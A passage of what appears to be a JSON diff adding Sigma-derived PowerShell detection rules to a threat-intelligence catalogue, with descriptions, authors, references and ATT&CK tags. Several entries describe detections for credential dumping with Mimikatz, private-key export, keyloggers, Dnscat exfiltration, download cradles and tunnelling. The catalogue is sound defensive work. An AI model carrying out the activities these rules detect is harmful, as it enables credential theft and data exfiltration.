], + "tags": [ + "attack.collection", + "attack.t1114.001" + ] + }, + "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "value": "Powershell Local Email Collection" + }, + { + "description": "Detects the use of PowerShell to identify the current logged user.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_current_user.yml", + "level": "low", + "logsource.category": "ps_script", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "value": "Suspicious PowerShell Get Current User" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "posh_ps_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": 
"posh_ps_cl_invocation_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", + "value": "Execution via CL_Invocation.ps1 (2 Lines)" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if archive operations are done via PowerShell." + ], + "filename": "posh_ps_data_compressed.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560" + ] + }, + "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "value": "Data Compressed - PowerShell" + }, + { + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_winlogon_helper_dll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "value": "Winlogon Helper DLL" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "22d80745-6f2c-46da-826b-77adaededd74", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" + }, + { + "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Mimikatz can be useful for testing the security of networks" + ], + "filename": "posh_ps_potential_invoke_mimikatz.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", + "value": "Potential Invoke-Mimikatz PowerShell Script" + }, + { + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + ], + "filename": "posh_ps_susp_follina_execution.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537919885031772161", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "value": "Troubleshooting Pack Cmdlet Execution" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + 
"creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/995111125447577600", + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "value": "Execution via CL_Mutexverifiers.ps1" + }, + { + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_adcomputer.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "value": "Active Directory Computers Enumeration with Get-AdComputer" + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "posh_ps_software_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": 
[ + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "value": "Detected Windows Software Discovery - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "value": "Invoke-Obfuscation Via Use Clip - Powershell" + }, + { + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_networkcredential.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "value": "Suspicious Connection to Remote Account" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_mount_diskimage.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", + "value": "Suspicious Mount-DiskImage" + }, + { + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "meta": { + "author": "Florian Roth, Perez Diego (@darkquassar)", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "value": "Suspicious PowerShell Keywords" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_recon_export.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "value": "Recon Information for Export with PowerShell" + }, + { + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_security_software_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", + "value": "Security Software Discovery by Powershell" + }, + { + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" + }, + { + "description": "Powershell use PassThru option to start in background", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_start_process.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", + "value": "Suspicious Start-Process PassThru" + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_remove_adgroupmember.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", + "value": "Remove Account From Domain Admin Group" + }, + { + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "posh_ps_susp_mounted_share_deletion.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", + "value": "PowerShell Deleted Mounted Share" + }, + { + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_proxy_scripts.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", + "value": "Suspicious TCP Tunnel Via PowerShell Script" + }, + { + "description": "Detects Base64 encoded Shellcode", + "meta": { + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "creation_date": "2018/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellcode_b64.yml", + 
"level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "value": "PowerShell ShellCode" + }, + { + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_export_pfxcertificate.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "value": "Suspicious Export-PfxCertificate" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + 
"creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "value": "Suspicious Get Local Groups Information - PowerShell" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" + }, + { + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_enable_windowsoptionalfeature.yml", + "level": 
"medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "55c925c1-7195-426b-a136-a9396800e29b", + "value": "Potential Suspicious Windows Feature Enabled" + }, + { + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_keylogger_activity.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", + "https://twitter.com/ScumBots/status/1610626724257046529", + "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" + ], + "tags": [ + "attack.collection", + "attack.credential_access", + "attack.t1056.001" + ] + }, + "uuid": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "value": "Potential Keylogger Activity" + }, + { + "description": "Get the processes that are running on the local computer.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" 
+ ], + "filename": "posh_ps_susp_get_process.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "af4c87ce-bdda-4215-b998-15220772e993", + "value": "Suspicious Process Discovery With Get-Process" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2022/01/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", + "value": "Clear PowerShell History - PowerShell" + }, + { + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_adgroup.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002" + ] + }, + "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", + "value": "Active Directory Group Enumeration With Get-AdGroup" + }, + { + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Legitimate use of the library" + ], + "filename": "posh_ps_download_com_cradles.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", + "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" + ], + "tags": "No established tags" + }, + "uuid": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "value": "Potential COM Objects Download Cradles Usage - PS Script" + }, + { + "description": "Dnscat exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + ], + "filename": "posh_ps_dnscat_execution.yml", + "level": "critical", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "value": "Dnscat 
